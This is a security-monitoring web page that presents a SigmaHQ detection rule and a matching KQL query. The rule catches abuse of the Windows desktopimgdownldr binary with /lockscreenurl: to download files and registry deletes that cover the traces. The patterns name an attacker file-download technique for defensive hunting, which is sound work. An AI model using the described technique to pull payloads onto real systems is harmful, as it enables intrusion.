← Back to SOC feed Coverage →

Suspicious Desktopimgdownldr Command

sigma HIGH SigmaHQ
T1105
imProcessCreate
This rule was pulled from an open-source repository and enriched with AI. Validate in a test environment before deploying to production.
View original rule at SigmaHQ →
Retrieved: 2026-05-07T23:00:00Z · Confidence: medium

Hunt Hypothesis

Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet

Detection Rule

Sigma (Original)

title: Suspicious Desktopimgdownldr Command
id: bb58aa4a-b80b-415a-a2c0-2f65a4c81009
status: test
description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
references:
    - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
    - https://twitter.com/SBousseaden/status/1278977301745741825
author: Florian Roth (Nextron Systems)
date: 2020-07-03
modified: 2021-11-27
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        CommandLine|contains: ' /lockscreenurl:'
    selection1_filter:
        CommandLine|contains:
            - '.jpg'
            - '.jpeg'
            - '.png'
    selection_reg:
        CommandLine|contains|all:
            - 'reg delete'
            - '\PersonalizationCSP'
    condition: ( selection1 and not selection1_filter ) or selection_reg
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment
level: high

KQL (Azure Sentinel)

imProcessCreate
| where (TargetProcessCommandLine contains " /lockscreenurl:" and (not((TargetProcessCommandLine contains ".jpg" or TargetProcessCommandLine contains ".jpeg" or TargetProcessCommandLine contains ".png")))) or (TargetProcessCommandLine contains "reg delete" and TargetProcessCommandLine contains "\\PersonalizationCSP")

Required Data Sources

Sentinel TableNotes
imProcessCreateEnsure this data connector is enabled

False Positive Guidance

MITRE ATT&CK Context

References

Original source: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml